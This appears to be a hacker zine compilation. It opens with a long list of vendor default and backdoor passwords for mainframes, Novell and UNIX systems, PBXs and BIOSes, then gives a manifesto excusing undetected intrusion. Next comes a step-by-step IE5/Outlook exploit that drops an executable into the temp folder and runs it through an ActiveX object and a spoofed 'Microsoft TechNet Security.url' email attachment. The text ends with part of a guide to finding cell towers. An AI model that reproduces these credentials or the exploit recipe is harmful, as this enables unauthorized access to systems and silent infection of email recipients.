Hewlett-Packard HP 2000/3000 MPE/xx MGR HPP189
Hewlett-Packard HP 2000/3000 MPE/xx MGR HPP196
Hewlett-Packard HP 2000/3000 MPE/xx MGR INTX3
Hewlett-Packard HP 2000/3000 MPE/xx MGR ITF3000
Hewlett-Packard HP 2000/3000 MPE/xx MGR NETBASE
Hewlett-Packard HP 2000/3000 MPE/xx MGR REGO
Hewlett-Packard HP 2000/3000 MPE/xx MGR RJE
Hewlett-Packard HP 2000/3000 MPE/xx MGR CONV
Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR SYS
Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR DISC
Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR SYSTEM
Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx PCUSER SYS
Hewlett-Packard HP 2000/3000 MPE/xx RSBCMON SYS
Hewlett-Packard HP 2000/3000 MPE/xx SPOOLMAN HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx WP HPOFFICE
Hewlett-Packard Vectra Console n/a hewlpack Admin
IBM AIX Multi guest (none) User
IBM AIX Multi guest guest User
IBM BIOS Console n/a IBM Admin
IBM BIOS Console n/a MBIU0 Admin
IBM BIOS Console n/a sertafu Admin
IBM OS/400 Multi ibm password
IBM OS/400 Multi ibm 2222
IBM OS/400 Multi ibm service
IBM OS/400 Multi qpgmr qpgmr
IBM OS/400 Multi qsecofr qsecofr
IBM OS/400 Multi qsecofr 11111111
IBM OS/400 Multi qsecofr 22222222
IBM OS/400 Multi qserv qserv
IBM OS/400 Multi qsvr qsvr
IBM OS/400 Multi qsvr ibmcel
IBM OS/400 Multi qsysopr qsysopr
IBM OS/400 Multi secofr secofr
IBM POS CMOS Console ESSEX
IBM POS CMOS Console IPC
IBM VM/CMS Multi $ALOC$ (none)
IBM VM/CMS Multi ADMIN (none)
IBM VM/CMS Multi AP2SVP (none)
IBM VM/CMS Multi APL2PP (none)
IBM VM/CMS Multi AUTOLOG1 (none)
IBM VM/CMS Multi BATCH (none)
IBM VM/CMS Multi BATCH1 (none)
IBM VM/CMS Multi BATCH2 (none)
IBM VM/CMS Multi CCC (none)
IBM VM/CMS Multi CMSBATCH (none)
IBM VM/CMS Multi CMSUSER (none)
IBM VM/CMS Multi CPNUC (none)
IBM VM/CMS Multi CPRM (none)
IBM VM/CMS Multi CSPUSER (none)
IBM VM/CMS Multi CVIEW (none)
IBM VM/CMS Multi DATAMOVE (none)
IBM VM/CMS Multi DEMO1 (none)
IBM VM/CMS Multi DEMO2 (none)
IBM VM/CMS Multi DEMO3 (none)
IBM VM/CMS Multi DEMO4 (none)
IBM VM/CMS Multi DIRECT (none)
IBM VM/CMS Multi DIRMAINT (none)
IBM VM/CMS Multi DISKCNT (none)
IBM VM/CMS Multi EREP (none)
IBM VM/CMS Multi FSFADMIN (none)
IBM VM/CMS Multi FSFTASK1 (none)
IBM VM/CMS Multi FSFTASK2 (none)
IBM VM/CMS Multi GCS (none)
IBM VM/CMS Multi IDMS (none)
IBM VM/CMS Multi IDMSSE (none)
IBM VM/CMS Multi IIPS (none)
IBM VM/CMS Multi IPFSERV (none)
IBM VM/CMS Multi ISPVM (none)
IBM VM/CMS Multi IVPM1 (none)
IBM VM/CMS Multi IVPM2 (none)
IBM VM/CMS Multi MAINT (none)
IBM VM/CMS Multi MOESERV (none)
IBM VM/CMS Multi NEVIEW (none)
IBM VM/CMS Multi OLTSEP (none)
IBM VM/CMS Multi OP1 (none)
IBM VM/CMS Multi OPERATNS (none)
IBM VM/CMS Multi OPERATOR (none)
IBM VM/CMS Multi PDMREMI (none)
IBM VM/CMS Multi PENG (none)
IBM VM/CMS Multi PROCAL (none)
IBM VM/CMS Multi PRODBM (none)
IBM VM/CMS Multi PROMAIL (none)
IBM VM/CMS Multi PSFMAINT (none)
IBM VM/CMS Multi PVM (none)
IBM VM/CMS Multi RDM470 (none)
IBM VM/CMS Multi ROUTER (none)
IBM VM/CMS Multi RSCS (none)
IBM VM/CMS Multi RSCSV2 (none)
IBM VM/CMS Multi SAVSYS (none)
IBM VM/CMS Multi SFCMI (none)
IBM VM/CMS Multi SFCNTRL (none)
IBM VM/CMS Multi SMART (none)
IBM VM/CMS Multi SQLDBA (none)
IBM VM/CMS Multi SQLUSER (none)
IBM VM/CMS Multi SYSADMIN (none)
IBM VM/CMS Multi SYSCKP (none)
IBM VM/CMS Multi SYSDUMP1 (none)
IBM VM/CMS Multi SYSERR (none)
IBM VM/CMS Multi SYSWRM (none)
IBM VM/CMS Multi TDISK (none)
IBM VM/CMS Multi TEMP (none)
IBM VM/CMS Multi TSAFVM (none)
IBM VM/CMS Multi VASTEST (none)
IBM VM/CMS Multi VM3812 (none)
IBM VM/CMS Multi VMARCH (none)
IBM VM/CMS Multi VMASMON (none)
IBM VM/CMS Multi VMASSYS (none)
IBM VM/CMS Multi VMBACKUP (none)
IBM VM/CMS Multi VMBSYSAD (none)
IBM VM/CMS Multi VMMAP (none)
IBM VM/CMS Multi VMTAPE (none)
IBM VM/CMS Multi VMTLIBR (none)
IBM VM/CMS Multi VMUTIL (none)
IBM VM/CMS Multi VSEIPO (none)
IBM VM/CMS Multi VSEMAINT (none)
IBM VM/CMS Multi VSEMAN (none)
IBM VM/CMS Multi VTAM (none)
IBM VM/CMS Multi VTAMUSER (none)
Intel Shiva Guest (none) User
Intel Shiva root (none) Admin
Iwill BIOS Console n/a iwill Admin
JetWay BIOS Console n/a spooml Admin
Joss Technology BIOS Console n/a 57gbzb Admin
Joss Technology BIOS Console n/a technolgi Admin
Lantronics Lantronics Terminal Server TCP 7000 n/a access Admin
Lantronics Lantronics Terminal Server TCP 7000 n/a system Admin
Leading Edge BIOS Console n/a MASTER Admin
Linksys Linksys DSL n/a admin Admin
Linux Slackware Multi gonzo (none) User
Linux Slackware Multi satan (none) User
Linux Slackware Multi snake (none) User
Linux UCLinux for UCSIMM Multi root uClinux Admin
Livingston Livingston Portmaster 3 !root (none)
Lucent System 75 bciim bciimpw
Lucent System 75 bcim bcimpw
Lucent System 75 bcms bcmspw
Lucent System 75 bcms bcmspw
Lucent System 75 bcnas bcnaspw
Lucent System 75 blue bluepw
Lucent System 75 browse browsepw
Lucent System 75 browse looker
Lucent System 75 craft craft
Lucent System 75 craft craftpw
Lucent System 75 craft craftpw
Lucent System 75 cust custpw
Lucent System 75 enquiry enquirypw
Lucent System 75 field support
Lucent System 75 inads indspw
Lucent System 75 inads indspw
Lucent System 75 inads inads
Lucent System 75 init initpw
Lucent System 75 locate locatepw
Lucent System 75 maint maintpw
Lucent System 75 maint rwmaint
Lucent System 75 nms nmspw
Lucent System 75 rcust rcustpw
Lucent System 75 support supportpw
Lucent System 75 tech field
M Technology BIOS Console n/a mMmM Admin
MachSpeed BIOS Console n/a sp99dd Admin
Magic-Pro BIOS Console n/a prost Admin
Megastar BIOS Console n/a star Admin
Mentec Micro/RSX MICRO RSX Admin
Micron BIOS Console n/a sldkj754 Admin
Micron BIOS Console n/a xyzall Admin
Micronics BIOS Console n/a dn_04rjc Admin
Microsoft Windows NT Multi (null) (none) User "Redbutton Hole"
Microsoft Windows NT Multi Administrator Administrator Admin
Microsoft Windows NT Multi Administrator (none) Admin
Microsoft Windows NT Multi Guest Guest User
Microsoft Windows NT Multi Guest (none) User
Microsoft Windows NT Multi IS_$hostname (same) User hostname = your
server name
Microsoft Windows NT Multi User User User
Mintel Mintel PBX n/a SYSTEM Admin
Motorola Motorola Cablerouter cablecom router Admin
NCR NCR UNIX Multi ncrm ncrm Admin
Netopia Netopia 7100 (none) (none)
Netopia Netopia 9500 netopia netopia
NeXT NeXTStep Multi me (none) User
NeXT NeXTStep Multi root NeXT Admin
NeXT NeXTStep Multi signa signa User
Nimble BIOS Console n/a xdfk9874t3 Admin
Nortel Meridian PBX Serial login 0000 AUTH codes in LD 8
Nortel Meridian PBX Serial spcl 0000 AUTH codes in LD 8
Novell Netware Multi ADMIN ADMIN
Novell Netware Multi ADMIN (none)
Novell Netware Multi ARCHIVIST (none)
Novell Netware Multi ARCHIVIST ARCHIVIST
Novell Netware Multi BACKUP (none)
Novell Netware Multi BACKUP BACKUP
Novell Netware Multi CHEY_ARCHSVR CHEY_ARCHSVR
Novell Netware Multi CHEY_ARCHSVR (none)
Novell Netware Multi FAX FAX
Novell Netware Multi FAX (none)
Novell Netware Multi FAXUSER FAXUSER
Novell Netware Multi FAXUSER (none)
Novell Netware Multi FAXWORKS (none)
Novell Netware Multi FAXWORKS FAXWORKS
Novell Netware Multi GATEWAY GATEWAY
Novell Netware Multi GATEWAY GATEWAY
Novell Netware Multi GATEWAY (none)
Novell Netware Multi GUEST TSEUG
Novell Netware Multi GUEST GUESTGUEST
Novell Netware Multi GUEST GUESTGUE
Novell Netware Multi GUEST GUEST
Novell Netware Multi GUEST (none)
Novell Netware Multi HPLASER (none)
Novell Netware Multi HPLASER HPLASER
Novell Netware Multi LASER (none)
Novell Netware Multi LASER LASER
Novell Netware Multi LASERWRITER LASERWRITER
Novell Netware Multi LASERWRITER (none)
Novell Netware Multi MAIL (none)
Novell Netware Multi MAIL MAIL
Novell Netware Multi POST (none)
Novell Netware Multi POST POST
Novell Netware Multi PRINT (none)
Novell Netware Multi PRINT PRINT
Novell Netware Multi PRINTER (none)
Novell Netware Multi PRINTER PRINTER
Novell Netware Multi ROOT (none)
Novell Netware Multi ROOT ROOT
Novell Netware Multi ROUTER (none)
Novell Netware Multi SABRE (none)
Novell Netware Multi SUPERVISOR NETFRAME
Novell Netware Multi SUPERVISOR NFI
Novell Netware Multi SUPERVISOR NF
Novell Netware Multi SUPERVISOR HARRIS
Novell Netware Multi SUPERVISOR SUPERVISOR
Novell Netware Multi SUPERVISOR (none)
Novell Netware Multi SUPERVISOR SYSTEM
Novell Netware Multi TEST TEST
Novell Netware Multi TEST (none)
Novell Netware Multi USER_TEMPLATE (none)
Novell Netware Multi USER_TEMPLATE USER_TEMPLATE
Novell Netware Multi WANGTEK (none)
Novell Netware Multi WANGTEK WANGTEK
Novell Netware Multi WINDOWS_PASSTHRU WINDOWS_PASSTHRU
Novell Netware Multi WINDOWS_PASSTHRU (none)
Novell Netware Multi WINSABRE SABRE
Novell Netware Multi WINSABRE WINSABRE
Nurit NOS $system (none) Admin
Osicom Osicom Plus T1/PLUS 56k write private
Osicom NETPrint 1000E/NDS Telnet sysadm sysadm Admin
Osicom NETPrint 1500E/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/B Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/B Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 2000 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 1000 T/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000 T/N Telnet sysadm sysadm Admin
Osicom NETPrint 1500 E/B Telnet sysadm sysadm Admin
Osicom NETPrint 1500E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1500T/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/D Telnet sysadm sysadm Admin
Osicom NETPrint 500 E/B Telnet sysadm sysadm Admin
Osicom NETPrint 500 E/N Telnet sysadm sysadm Admin
Osicom NETPrint 500 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 500 T/N Telnet sysadm sysadm Admin
Osicom NETCommuter Remote Access Server Telnet sysadm sysadm Admin
Osicom JETXPrint 1000E/B Telnet sysadm sysadm Admin
Osicom JETXPrint 1000E/N Telnet sysadm sysadm Admin
Osicom JETXPrint 1000T/N Telnet sysadm sysadm Admin
Osicom JETXPrint 500 E/B Telnet sysadm sysadm Admin
Osicom NETCommuter Remote Access Server Telnet Manager Manager Admin
Osicom NETCommuter Remote Access Server Telnet guest guest User
Osicom NETCommuter Remote Access Server Telnet echo echo User
Osicom NETCommuter Remote Access Server Telnet debug d.e.b.u.g User
Osicom NETPrint 1500 E/B Telnet Manager Manager Admin
Osicom NETPrint 1500 E/B Telnet guest guest User
Osicom NETPrint 1500 E/B Telnet echo echo User
Osicom NETPrint 1500 E/B Telnet debug d.e.b.u.g User
Osicom NETPrint 1000E/D Telnet Manager Manager Admin
Osicom NETPrint 1000E/D Telnet guest guest User
Osicom NETPrint 1000E/D Telnet echo echo User
Osicom NETPrint 1000E/D Telnet debug d.e.b.u.g User
Osicom NETPrint 1000E/NDS Telnet Manager Manager Admin
Osicom NETPrint 1000E/NDS Telnet guest guest User
Osicom NETPrint 1000E/NDS Telnet echo echo User
Osicom NETPrint 1000E/NDS Telnet debug d.e.b.u.g User
Osicom NETPrint 1500E/N Telnet Manager Manager Admin
Osicom NETPrint 1500E/N Telnet guest guest User
Osicom NETPrint 1500E/N Telnet echo echo User
Osicom NETPrint 1500E/N Telnet debug d.e.b.u.g User
Osicom NETPrint 2000E/N Telnet Manager Manager Admin
Osicom NETPrint 2000E/N Telnet guest guest User
Osicom NETPrint 2000E/N Telnet echo echo User
Osicom NETPrint 2000E/N Telnet debug d.e.b.u.g User
Packard Bell BIOS Console n/a bell9 Admin
Prime PrimeOS Multi guest guest User
Prime PrimeOS Multi guest1 guest User
Prime PrimeOS Multi guest1 guest1 User
Prime PrimeOS Multi mail mail User
Prime PrimeOS Multi mfd mfd User
Prime PrimeOS Multi netlink netlink User
Prime PrimeOS Multi prime prime User
Prime PrimeOS Multi primenet primenet User
Prime PrimeOS Multi primenet primeos User
Prime PrimeOS Multi primos_cs primos User
Prime PrimeOS Multi primos_cs prime User
Prime PrimeOS Multi system prime Admin
Prime PrimeOS Multi system system Admin
Prime PrimeOS Multi tele tele User
Prime PrimeOS Multi test test User
QDI BIOS Console n/a QDI Admin
QDI SpeedEasy BIOS Console n/a lesarotl Admin
Quantex BIOS Console n/a teX1 Admin
Quantex BIOS Console n/a xljlbj Admin
Radio Shack Radio Shack Screen Saver Console n/a RS<storeid> User
Ramp Networks WebRamp wradmin trancell
Research BIOS Console n/a Col2ogro2 Admin
Semaphore PICK O/S DESQUETOP
Semaphore PICK O/S DS
Semaphore PICK O/S DSA
Semaphore PICK O/S PHANTOM
Shuttle BIOS n/a Spacve Admin
Siemens PhoneMail poll tech
Siemens PhoneMail sysadmin sysadmin
Siemens PhoneMail tech tech
Siemens ROLM PBX admin pwp
Siemens ROLM PBX eng engineer
Siemens ROLM PBX op op
Siemens ROLM PBX op operator
Siemens ROLM PBX su super
Siemens Nixdorf BIOS Console n/a SKY_FOX Admin
Silicon Graphics IRIX Multi 4Dgifts 4Dgifts Admin
Silicon Graphics IRIX Multi 4Dgifts (none) Admin
Silicon Graphics IRIX Multi demos (none) Admin
Silicon Graphics IRIX Multi Ezsetup (none) Admin
Silicon Graphics IRIX Multi field field Admin
Silicon Graphics IRIX Multi OutOfBox (none) Admin
Silicon Graphics IRIX Multi tour tour Admin
Silicon Graphics IRIX Multi tutor (none) Admin
Silicon Graphics IRIX Multi tutor tutor Admin
SuperMicro BIOS Console n/a ksdjfg934t Admin
Taco Bell Proprietary System (?) rgm rollout
Taco Bell Proprietary System (?) tacobell (none)
Tinys BIOS Console n/a tiny Admin
TMC BIOS Console n/a BIGO Admin
Toshiba BIOS Console n/a 24Banc81 Admin
Toshiba BIOS Console n/a Toshiba Admin
Toshiba BIOS Console n/a toshy99 Admin
UNIX Generic Multi adm adm
UNIX Generic Multi adm (none)
UNIX Generic Multi admin admin
UNIX Generic Multi administrator administrator
UNIX Generic Multi administrator (none)
UNIX Generic Multi anon anon
UNIX Generic Multi bbs bbs
UNIX Generic Multi bbs (none)
UNIX Generic Multi bin sys
UNIX Generic Multi bin sys
UNIX Generic Multi checkfs checkfs
UNIX Generic Multi checkfsys checkfsys
UNIX Generic Multi checksys checksys
UNIX Generic Multi daemon daemon
UNIX Generic Multi daemon (none)
UNIX Generic Multi demo demo
UNIX Generic Multi demo (none)
UNIX Generic Multi demos demos
UNIX Generic Multi demos (none)
UNIX Generic Multi dni (none)
UNIX Generic Multi dni dni
UNIX Generic Multi fal (none)
UNIX Generic Multi fal fal
UNIX Generic Multi fax (none)
UNIX Generic Multi fax fax
UNIX Generic Multi ftp (none)
UNIX Generic Multi ftp ftp
UNIX Generic Multi games games
UNIX Generic Multi games (none)
UNIX Generic Multi gopher gopher
UNIX Generic Multi gropher (none)
UNIX Generic Multi guest guest
UNIX Generic Multi guest guestgue
UNIX Generic Multi guest (none)
UNIX Generic Multi halt halt
UNIX Generic Multi halt (none)
UNIX Generic Multi informix informix
UNIX Generic Multi install install
UNIX Generic Multi lp lp
UNIX Generic Multi lp bin
UNIX Generic Multi lp lineprin
UNIX Generic Multi lp (none)
UNIX Generic Multi lpadm lpadm
UNIX Generic Multi lpadmin lpadmin
UNIX Generic Multi lynx lynx
UNIX Generic Multi lynx (none)
UNIX Generic Multi mail (none)
UNIX Generic Multi mail mail
UNIX Generic Multi man man
UNIX Generic Multi man (none)
UNIX Generic Multi me (none)
UNIX Generic Multi me me
UNIX Generic Multi mountfs mountfs
UNIX Generic Multi mountfsys mountfsys
UNIX Generic Multi mountsys mountsys
UNIX Generic Multi news news
UNIX Generic Multi news (none)
UNIX Generic Multi nobody (none)
UNIX Generic Multi nobody nobody
UNIX Generic Multi nuucp (none)
UNIX Generic Multi operator operator
UNIX Generic Multi operator (none)
UNIX Generic Multi oracle (none)
UNIX Generic Multi postmaster postmast
UNIX Generic Multi postmaster (none)
UNIX Generic Multi powerdown powerdown
UNIX Generic Multi rje rje
UNIX Generic Multi root root
UNIX Generic Multi root (none)
UNIX Generic Multi setup setup
UNIX Generic Multi shutdown shutdown
UNIX Generic Multi shutdown (none)
UNIX Generic Multi sync sync
UNIX Generic Multi sync (none)
UNIX Generic Multi sys sys
UNIX Generic Multi sys system
UNIX Generic Multi sys bin
UNIX Generic Multi sysadm sysadm
UNIX Generic Multi sysadm admin
UNIX Generic Multi sysadmin sysadmin
UNIX Generic Multi sysbin sysbin
UNIX Generic Multi system_admin (none)
UNIX Generic Multi system_admin system_admin
UNIX Generic Multi trouble trouble
UNIX Generic Multi umountfs umountfs
UNIX Generic Multi umountfsys umountfsys
UNIX Generic Multi umountsys umountsys
UNIX Generic Multi unix unix
UNIX Generic Multi user user
UNIX Generic Multi uucp uucp
UNIX Generic Multi uucpadm uucpadm
UNIX Generic Multi web (none)
UNIX Generic Multi web web
UNIX Generic Multi webmaster webmaster
UNIX Generic Multi webmaster (none)
UNIX Generic Multi www (none)
UNIX Generic Multi www www
Verifone Verifone Junior 2.05 (none) 166816
Vextrec Technology BIOS Console n/a Vextrex
Vobis BIOS Console n/a merlin
Wim Bervoets WIMBIOSnbsp BIOS Console n/a Compleri Admin
WWWBoard WWWADMIN.PL HTTP WebAdmin WebBoard Admin
Xyplex Routers Port 7000 n/a access User
Xyplex Routers Port 7000 n/a system Admin
Xyplex Terminal Server Port 7000 n/a access User
Xyplex Terminal Server Port 7000 n/a system Admin
Zenith BIOS Console n/a 3098z Admin
Zenith BIOS Console n/a Zenith Admin
ZEOS BIOS Console n/a zeosx Admin
Zyxel Generic Routers n/a 1234 Admin

"Credits toward collecting these default passwords go to the Security
Focus VULN-DEV mailing list, and specifically to contributors such as:

Roel of Temmingh, Nathan Einwechter <compsecure@softhome.net>,
George Kurtz, Stephen Friedl, Sebastian Andersson, Jonathan Leto,
Mike Blomgren, Knud Erik H0jgaard <mobileunit@mobileunit.org>, Axel Dunkel,
Mathias Bogaert, Jonatan Leto, Chris Owen, Jim Wildman, Santiago Zapata,
Brian S. DuRoss, M J <lurker@ITIS.COM>, Will Spencer, Kevin Reynolds,
MaxVision, Bluefish, Runar Jensen, Ex Machina, Matt van Amsterdam,
Daniel Monjar, Rodrigo Bardosa, Damir Rajnovic, and scores of others."

---

.4ncifer manifest ; 001 ; 07.06-00

***********************************************************************

Since I first started learning about computers, I was amazed by this
new culture, this select group of people. We are smart, clever, and
hold true to our personal morals. Some people, I quickly learned after
that, seem to take enjoyment from using what real hackers code.

These 'script kiddies' bother me as much as the next hacker; they don't have
these morals, the ethics of a true hacker.

A hacker, in my personal opinion, is a person, a rebel, that uses their
talents, gifts, and knowledge to commandeer more knowledge and skills to
gain more knowledge and skills on top of that. They thrive by learning. They
absorb, expand, and control. This control is what scares the 'others'.

You've probably never heard of me. That's perfectly alright. Anonymity is
just as sacred as popularity. I don't deface websites. I can, but I don't. I
don't see the need. Maybe, someday, there will be, but neither my political
-or- social demand such defacements. I reserve quick judgment upon people
who do deface websites. They might have their reasons, and these motives
show themselves in the defacements. People are entitled to their opinion, as
much as I am mine, but the few (maybe most) who deface just to do it are
pathetic. They may have the 'skillz' to achieve the defacement, but if there
isn't any honor in the act, what does that show of the person committing it?

True hackers have this honor. They simply learn to do so. I've witnessed
people argue about how the media throws the term 'hacker' around. I agree
that they don't use the term correctly, but they don't use the terms
'cracker' or 'phreak' plausibly either. Being a cracker does not denote a
criminal, the same with a hacker. There are bad crackers & good crackers.
There are bad hackers & good crackers. The media simply doesn't understand
the whole picture. This culture of ours is too complex and volatile for the
media to keep up. There are a few worthwhile hacker news sites.
www.hackernews.com being the best in my opinion.

We all desire knowledge. This we gain; whether legally or illegally. I think
that it shouldn't be illegal if the server doesn't know you're there.

Coming out of all of that, you may be a little confused. Never have I
denoted even my existence upon the internet, except for this one time in
which I get out my cents. I will know disappear again.

I hope I have encouraged some people to become true hackers, not script
kiddies. I hope I have discouraged the blatant use of web defacing. I hope I
have encouraged actually having ethics and staying with them; they are all
that define a person. I hope I have made a good impression with all who read
this, and that those people thrive, not merely stay alive.

As a leaving statement:
"Learn to love to read, and you'll love to learn all the more.
Then only comes experience, then, all the more, you'll score."

---

<slow-fie> Uhm, well, never to get high... I used to let a thin layer of
elmer's school glue dry on my arm and peel it off like the aliens
from that 80's sci-fi show "V"

Intro
~~~~~
Internet Explorer 5, and the mail and news clients which come with it
(on Win95/98/2K) are very strange in that they choose to ignore user input.
More specifically, this allows us to manually force a file onto the target
computer, despite all prompts and warnings.

How can this be done?
~~~~~~~~~~~~~~~~~~~~~
We begin by creating a simple HTML FrameSet and embed, in base 64, our file:
<frameset rows=3D"10%,*">
<frame src=3D"mars.exe">
</frameset>

What happens?
~~~~~~~~~~~~~
What we do now is create a very simple HTML Mail or News file and send it to
the target computer. When they receive this file, and open it, the recipient
will be prompted as to whether they would like to "save" "open" or "cancel".
None of these really work. When the recipient decides which one to choice,
the files is being injected into the temp folder. Selecting any of the
three choices becomes completely useless. The file is still delivered to
the temp folder. Even if their system's "Security Zone" sets it to
DISABLE, they just get a slightly different prompt which only allows you
to press OK, and this is, once again, useless.

No matter what, the file is delivered into the temp folder.

So? What next?
~~~~~~~~~~~~~~
Well, next create a second file which contains a new ActiveX control:
(CLSID:15589FA1-C456-11CE-BF01-00AA0055595A)
Which allows us to execute files locally. We embed the simple JavaScripting
that runs this together with the ActiveX control, in base 64, and embed that in
a second html frame:

Then we apply the VERY simple HTTP-EQUIV meta tag of refresh.

and repack again in base64.

What are the results?
~~~~~~~~~~~~~~~~~~~~~
The first file deposits the *.exe and second *.mhtml files into the
temp directory. The client will be asked as to save, open, or cancel.
No matter what choice they make, these files will be deposited as soon
as the prompt has been close. The meta refresh will bounce to the

.mhtml in the temp dir, open it and execute the JavaScript and ActiveX

control and run the *.exe.

None of the Security Zone settings will prevent this because we are working
locally from the temp directory.

Now you want to do this over e-mail?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Of course it can! You have a greater chance of failing though.

Create two sets of html messages:

The first one comprising of the file to be delivered:

Note: to be executed from mail client. Simple *.bat containing @exit

The second comprising of a fraudulent, manufactured *.url:

Content-Type: application/octet-stream;
name=3D"Microsoft TechNet Security.url"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename=3D"Microsoft TechNet Security.url"

[DEFAULT]
BASEURL=3DC:\WINDOWS\TEMP\refresh.bat
[InternetShortcut]
URL=3DC:\WINDOWS\TEMP\refresh.bat

We include a fake link: <font color=3Dblue style=3D"cursor:hand">....

The recipient will then be forced to entertain the fraudulent *.url

You can get any local .exe to execute in IE by referring to it in the
CODEBASE parameter of an ActiveX object tag. The CLASSID can be anything
but all zeros. Here is a code snippet, courtesy of Dildog, which will
execute calc.exe if it is in c:\windows\system32\

The other problem is the fact that .exe files can get downloaded to your
local system without you being able to cancel the operation.
I tested the malware exploit on win98 with medium security settings
(the default) and it worked as promised.

But what was far worse was it worked at the high security setting also.
A warning message came up saying "Due to your security settings you cannot
download that file." You press OK and the file is downloaded anyway.
Then it executes when used as the codebase of an ActiveX control.

The demo exploit won't work in W2K because the temp directory where the
.exe is downloaded to is "c:\documents and
settings\'username'\local settings\temp". If it is possible to get the
username through JavaScript and another ActiveX control it could possibly
be made to work there also.

I hope you enjoyed this file and find it useful.
It's early in the morning/late at night so I'm kinda burnt.

The Non-Existent Crew rocks! Where proud to be Canadian eh!

-- PsychoSpy
PsychoSpy@softhome.net
ICQ#: 5057653

---

RADIO DIRECTION FINDING WITH PCS/GSM MOBILE TERMINALS
Bunny Hunting the Cell Towers

by wargames <wargames.edmc@net.nospam>

--== RDF Theory ==--

"Blah blah blah Ginger! Blah blah. Blah blah blah blah! Blah Ginger!"[1] If
you want something about RDF theory, I suppose I can cook something together,
but I'm sure you'd prefer just to get some useful HowTo info.

--== RDF on ClearNET CDMA (Sony CMB1207) ==--

Once in field service mode, the display shows the cell number (PN Offset) and
signal strength. No usable signal and the weakest usable signal are displayed
as 0x80 and the strongest normally encountered signal will be shown as 0xFF.
Beyond the normal range, the meter will wrap around to the range 0x00 to 0x7F.
Power levels in this range indicate the base station is less than 150m away
from the handset.

Clearnet's cell sites are usually configured with 3 cells per tower. Cells are
separated by a PseudoNoise Offset (cell-specific CDMA channel code) of 168,
and are nominally 120 degrees apart. Repeaters will most likely look like odd
cells. Circling the tower, 2 of the offsets will be related, while one is way
out to lunch and has a very narrow (and far-reaching corridor). Geckobeach [2]
reports that Clearnet orients their towers with the middle PN offset facing
south - There is evidence that in Edmonton (in the southeast and downtown
areas at least) the middle offset faces east. This may not hold true in all
places - verify the orientation of the PN offsets with the angle of the cells
and a compass.

This pattern of fixing PN offset direction makes cell hunting quite simple.
Look for a transition of 'L=H-336' or 'H=L+336'. The L->H transition indicates
that, for a northbound observer, the cell is located on a west vector +/-5deg.
Cells aren't perfect radiators - they do spill over somewhat. In a worst-case
scenario, at the intersection of 3 towers' coverage, "thrashing", (fast random
or circular handoffs) may occur as 6 antennae pick up a handset in their zone.
Oscillation between 2 PN offsets is a sure sign of having found a cell
boundary. Follow it home and tag it. H-L transitions for a southbound observer
obviously indicates a cell to the east. Repeater behaviour is not clearly
defined.

--== RDF on MicroCell GSM (N5190 v5.81 ) ==--

In their infinite cleverness, Nokia's engineers put the required data displays
on different screens. This is mostly a minor inconvenience, since the 5190's
test mode shows far more infomation than the Qualcomm digital engine in the
Sony handset. The information requred to trace cells is located on screens 3
and 11, with some useful tidbits found on 4 and 1. Screen 3 shows signal
strength and control channel numbers for the currently serving cell, along
with it's 2 nearest neighbours. Screen 11 gives CGI (Cell Global Identity)
information. Screen 4 continues the nearest neighbour display, allowing us to
predict which cells it is possible for us to move into, and the timing advance
parameter on screen 1 offers clues to the distance from the base station.

screen 1 3 4 11
L1 533 -72 xxx 533 27-72 27 516 6-93 6 CC:302 NC37?
L2 0 1 x xxxx 523 15-84 15 513 2-96 2 LAC: 3100
L3 27 27 536 13-86 13 515 -1100 -1 CH : 533
L4 CCCH N N N N N CID: 10063

When interpreted as MCC:MNC:LAC:CID, the format of the CGI data resembles, in
no small way, the numbering conventions used for ethernet addresses. In fact
the CGI number is globally unique to that antenna. The first to fields are the
Country Code and Network Code. These are an assigned prefix, and the latter 2
fields are essentially a manufacturer / operator serial number. Just as there
can be many ethernet cards whose MAC addresses end in 'C0:FF:EE', there can be
many cells whose LAC/CID pair is 1264/8430. The ethernet analogy remains
appropriate when considering the base station as a router. A computer can (and
often does) have multiple network adaptors, so does a base station - each cell
can be cosidered to be a NIC.

The 5190's data display is unique in that it diplays, for each control
channel, 2 numbers RxL and PLCC (Receive Level and Path Loss Compensation
Coeffiecient) such that PLCC-RxL=99. The list of neighbourly cells is sorted
by signal strength, thus making a relatively easy job of predicting the which
cell will be the next service cell. Screen 3 may be the most useful for
finding the tower, but screen 11 is where the actual tower ID is. Do not be
fooled by the control channel ID - it is only a channel. It can and will
change with network load. That said, control channel ID is the fastest way to
find a cell. Whenever the control channel changes, compare the old and new
values to see if they indicate a new cell or merely a new channel. If a new
cell seems more probable, verify this on screen 11. Apparently MicroCell
orients their cells in the shape of a capital 'Y', numbered 1-3 clockwise from
the southeast sector. (I'll have to verify that - Edmonton seems to be wierd
for cell configs.)

Screens 4 and 5 are more neighbours. Likely, you won't need to use their
information, except maybe to bootstrap your seach. GSM is a time-sensitive
protocol. To compensate for distance from the tower, the network can direct
the phone to transmit sooner, rather than later. This is shown in the timing
advance paramaeter, found on screen 1, line 3, field 2. It varies between 0
("is that a tower in your pocket or are you just happy to see me?") up to 63
(nearly a long-distance call). For what it's worth, the maximum radius of a
GSM cell is 35km, due to this timing sensitivity. Thus, 1 unit of timing
advance is approximately equal to being 550m from the tower. What with the
size of cells in metro areas, it's doubtful that this value should ever go
above 12. Nonetheless, it may serve as a useful way to check your work.

--== RDF in action ==--

[image] Mapping begins by defining a "Base Point". This is a point on a map
tagged with a vector approximating the direction of arrival of the signal. If
this vector is copied and rotated 90 degrees and 180 degrees, projections of
